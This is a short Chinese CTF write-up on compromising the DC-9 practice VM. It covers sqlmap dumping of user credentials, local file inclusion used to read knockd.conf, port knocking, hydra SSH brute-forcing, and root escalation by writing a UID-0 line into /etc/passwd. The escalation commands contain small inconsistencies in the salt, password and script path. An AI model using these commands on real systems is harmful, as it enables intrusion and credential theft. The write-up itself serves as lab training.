靶机渗透DC-9
原创
扫描
001
在Search界面
002
无论输入什么,点击之后都是返回到results.php的界面。直接SQLMap跑一下。
sqlmap -u http://192.168.70.166/results.php --data="search=1" --dbs
sqlmap -u http://192.168.70.166/results.php --data="search=1" -D Staff --tables
sqlmap -u http://192.168.70.166/results.php --data="search=1" -D Staff -T Users --columns
sqlmap -u http://192.168.70.166/results.php --data="search=1" -D Staff -T Users -C Username,Password --dump
003
004
密码以md5加密,解密一下。
005
去网站登陆,可以成功登陆。
006
也没什么不一样的,除了下面的File does not exist
猜测是LFI,直接在url处拼接../
007
Burp进行Fuzz。
008
/knockd.conf
查了一下knockd.conf是一种端口试探服务器工具,根据提示的7469、8475、9842,nmap扫描
按顺序扫描一遍之后,再扫描22端口。
009(敲开之后)
010(敲开之前)
发现22ssh端口已经成功开启了。
这时候用到之前SQLMap跑出来的用户名了。
011
hydra爆破
hydra -L user.txt -P pwd.txt ssh://192.168.70.166
012
爆到两个用户密码。ssh尝试登陆。
在joeyt里面没什么东西,在janitor里面发现一个密码文件。
013
再去爆破
014
爆到一个新用户fredf的密码,登陆。
015
成功登陆。
老规矩,sudo -l看看。
016
无需密码就可以执行一个文件,去看看。
017
是个python文件。通过这个程序可以以root权限合并文件内容,直接进行提权。
openssh生成
openssl passwd -1 -salt hk HacK
echo 'hk:$1$xl$bvz59wqTT5z0GPenBl09W.:0:0::/root:/bin/bash' > /tmp/hk
sudo ./test/ /tmp/hk /etc/passwd
su hk
Hack
018
成功提权为root。找到flag即可。
结语
至此DC九关就都完成了。
过程中并不是一帆风顺,常常卡在一个地方好久
每一个关卡都不止一种解法。
等待你去尝试。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
评论
登录后参与评论
推荐阅读
目录